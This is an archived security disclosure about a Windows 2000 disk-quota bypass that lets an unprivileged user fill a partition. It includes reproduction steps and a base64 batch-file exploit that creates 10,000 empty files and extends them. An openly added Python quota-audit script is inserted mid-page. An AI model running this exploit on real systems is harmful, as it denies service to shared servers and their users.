Disk (over)quota in Windows 2000

From: Dave Tarbatt - ACS (D.A.Tarbattat_private)
Date: Mon Feb 28 2000 - 06:00:04 PST

    I've been looking into disk quotas under Windows 2000 and have uncovered a
    few anomalies. On top of a few peculiarities there appears to be a bug which
    allows a user to exceed their disk quota by as much as they wish.
    
    *** The problem:
    Tested with Windows 2000 Professional build 2195 (release version). Existing
    files can be extended even if a user is over quota. If exploited by a
    malicious user then at best it is a nuisance; at worst it may act as a DoS if
    the disk is filled.
    
    *** Description:
    After playing around with the newly introduced disk quotas in Windows 2000 I
    soon uncovered a bug which would allow an ordinary, unprivileged user to
    exceed their allocated disk quota and fill a disk/partition. Under normal
    circumstances when a user is under quota I discovered by experiment that new
    files can be created up to a size of (Quota - UsedSpace + 2KB - 1byte), i.e.
    they can go overquota by up to 2047 bytes. Not too much of a problem.
    Extending existing files can be up to (Quota - UsedSpace +1KB -1byte) i.e. up
    to 1023 bytes overquota - nothing much to be worried about.
    
    However, if you are overquota new file creation is only possible up to 728
    bytes if (UsedSpace < Quota+1KB), i.e. you haven't gone more than 1KB
    overquota. Existing files can be extended by up to 736 bytes up until
    (UsedSpace >= Quota+1KB). Using this point alone, I created a lot of files
    with "echo.>file0000" at 2 bytes each to use up the user allocated diskquota
    and extended them up to the 736 byte limit per file - I was now way over
    quota.
    
    The limit of how far over quota I could go depended on my initial quota and
    how many tiny files I could create up until I hit the quota then extending
    them all. Then I thought "What if I create 0 byte files?".
    
    Oh dear! If you are under quota you can create as many 0 byte files as you
    wish. They count towards nothing. Then extend these files by 736 bytes and
    your disk starts filling up and up and up...
    
    *** To recreate (typical example):
    Create an ordinary unprivileged user and give them a diskquota of, say, 1MB.
    Open a command prompt and using whatever means you wish, create a lot of 0
    byte files (e.g. SHIFT>FILE0000). Then append/extend those files by up to 736
    bytes (e.g. ECHO 736-characters-here>>FILE0000). If you try and extend beyond
    736 bytes the file and its contents get chopped off at 674 bytes so for
    speed disk filling with fewer files don't try and go beyond 736 bytes.
    
    See attachment for a batch file to create 10,000 0 byte files then extend
    them all to 736 bytes.
    
    *** Workaround/fix:
    None known. However, to prevent DoS on servers you should not permit people
    to write to the same partition that the operating system resides on.
    
    Dave,
    
    http://redirect.to/null/
    PGP fingerprint: AE23 A19C 3E5E 74F4 2193  4BB3 E154 54AF
    
       ---- File information -----------
         File:  OverQuota.BAT
         Date:  25 Feb 2000, 22:03
         Size:  1008 bytes.
         Type:  Text
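
A defender-side audit for the condition described in the message above, as an added example that is not part of the original post or its attachment: it totals actual file sizes per owner from a file inventory and flags owners well past their quota or holding an unusual number of empty files. The CSV layout, the `audit` and `build_sample` functions, the sample users and paths, and the 1000-file alert threshold are assumptions; the 2047 and 736 byte figures are the ones reported in the message.

```python
import csv
import io
from collections import defaultdict

# Figures reported in the message above (Windows 2000 Professional build 2195).
NORMAL_SLACK = 2047    # largest overshoot reported for a user who is under quota
SMALL_FILE_MAX = 736   # largest extension reported to succeed once over quota


def audit(inventory_csv, quotas, zero_byte_alert=1000):
    """Return {owner: finding} for a CSV inventory with owner,bytes,path columns.

    quotas maps owner -> quota limit in bytes; owners without a quota are skipped.
    zero_byte_alert is an assumed threshold, tune it for the volume being audited.
    """
    stats = defaultdict(lambda: {"bytes": 0, "files": 0, "zero": 0, "small": 0})
    for row in csv.DictReader(io.StringIO(inventory_csv)):
        size = int(row["bytes"])
        s = stats[row["owner"]]
        s["bytes"] += size
        s["files"] += 1
        s["zero"] += size == 0                   # files that cost no quota
        s["small"] += 0 < size <= SMALL_FILE_MAX  # files at or under the 736 byte limit

    findings = {}
    for owner, s in stats.items():
        if owner not in quotas:
            continue
        over = s["bytes"] - quotas[owner]
        if over > NORMAL_SLACK:          # beyond the overshoot reported as normal
            status = "OVER_QUOTA"
        elif s["zero"] >= zero_byte_alert:
            status = "MANY_EMPTY_FILES"  # under quota but holding many empty files
        else:
            status = "OK"
        findings[owner] = {"status": status, "over_by": max(over, 0), **s}
    return findings


def build_sample():
    """Constructed inventory (not real data): three users, 1 MB quota each."""
    rows = ["owner,bytes,path"]
    rows += [f"alice,736,D:\\home\\alice\\FILE{i:04d}" for i in range(2000)]
    rows += [f"bob,0,D:\\home\\bob\\FILE{i:04d}" for i in range(1500)]
    rows += ["carol,1049000,D:\\home\\carol\\report.doc"]
    return "\n".join(rows)


if __name__ == "__main__":
    q = 1024 * 1024
    for owner, f in audit(build_sample(), {"alice": q, "bob": q, "carol": q}).items():
        print(owner, f["status"], "over by", f["over_by"], "small files:", f["small"])
```

Because the audit sums the sizes found on disk rather than trusting the quota system's own usage figure, it still reports an owner whose tracked usage has drifted from what their files actually occupy.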
    
    --Message-Boundary-10304
    Content-type: Application/Octet-stream; name="OverQuota.BAT"; type=Text
    Content-disposition: attachment; filename="OverQuota.BAT"
    Content-transfer-encoding: BASE64
    
    QGVjaG8gb2ZmDQplY2hvIFdpbmRvd3MgMjAwMCBkaXNrIChvdmVyKXF1b3RhIGV4cGxvaXQN
    CmVjaG8gRGF2ZSBUYXJiYXR0IDI2LzAyLzIwMDAgaHR0cDovL3JlZGlyZWN0LnRvL251bGwv
    DQpyZW0NCnJlbSBDcmVhdGUgMTAsMDAwIHplcm8gYnl0ZSBmaWxlcyAoJ1JFTT5maWxlbmFt
    ZScgdXNlZCB0byB3b3JrIGJ1dCBub3QgYW55IG1vcmUpDQplY2hvIENyZWF0aW5nIDEwLDAw
    MCB6ZXJvIGJ5dGUgZmlsZXMuLi4NCmZvciAlJWkgaW4gKDAgMSAyIDMgNCA1IDYgNyA4IDkp
    IGRvIGZvciAlJWogaW4gKDAgMSAyIDMgNCA1IDYgNyA4IDkpIGRvIGZvciAlJWsgaW4gKDAg
    MSAyIDMgNCA1IDYgNyA4IDkpIGRvIGZvciAlJWwgaW4gKDAgMSAyIDMgNCA1IDYgNyA4IDkp
    IGRvIHNoaWZ0PkZJTEUlJWklJWolJWslJWwNCnJlbQ0KcmVtIENyZWF0ZSBhIDczNiBieXRl
    IGZpbGUgKHRoZSBsYXJnZXN0IGV4dGVudCB0aGF0IHdvcmtzKQ0KZWNobyBDcmVhdGluZyA3
    MzYgYnl0ZSBmaWxlLi4uDQpzaGlmdD43MzYudHh0DQpmb3IgJSVpIGluICgwIDEgMiAzIDQg
    NSA2IDcgOCA5IDEwIDExIDEyIDEzIDE0IDE1IDE2IDE3IDE4IDE5IDIwIDIxIDIyKSBkbyBm
    b3IgJSVqIGluICgwIDEgMiAzIDQgNSA2IDcgOCA5IDEwIDExIDEyIDEzIDE0IDE1KSBkbyBl
    Y2hvLj4+NzM2LnR4dA0KcmVtDQpyZW0gQXBwZW5kaW5nIHRoZSA3MzYgYnl0ZSBmaWxlIHRv
    IGFsbCB0aGUgZW1wdHkgb25lcyAoZXh0ZW5kIHRoZW0pDQplY2hvIEFwcGVuZGluZyA3MzYg
    Ynl0ZXMgdG8gYWxsIDEwLDAwMCBmaWxlcy4uLg0KZm9yICUlaSBpbiAoMCAxIDIgMyA0IDUg
    NiA3IDggOSkgZG8gZm9yICUlaiBpbiAoMCAxIDIgMyA0IDUgNiA3IDggOSkgZG8gZm9yICUl
    ayBpbiAoMCAxIDIgMyA0IDUgNiA3IDggOSkgZG8gZm9yICUlbCBpbiAoMCAxIDIgMyA0IDUg
    NiA3IDggOSkgZG8gdHlwZSA3MzYudHh0Pj5GSUxFJSVpJSVqJSVrJSVsDQpyZW0NCmVjaG8u
    DQplY2hvIERvbmUuIE1hc3NpdmVseSBvdmVyIHF1b3RhIQ0K
    
    --Message-Boundary-10304--
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:37:54 PDT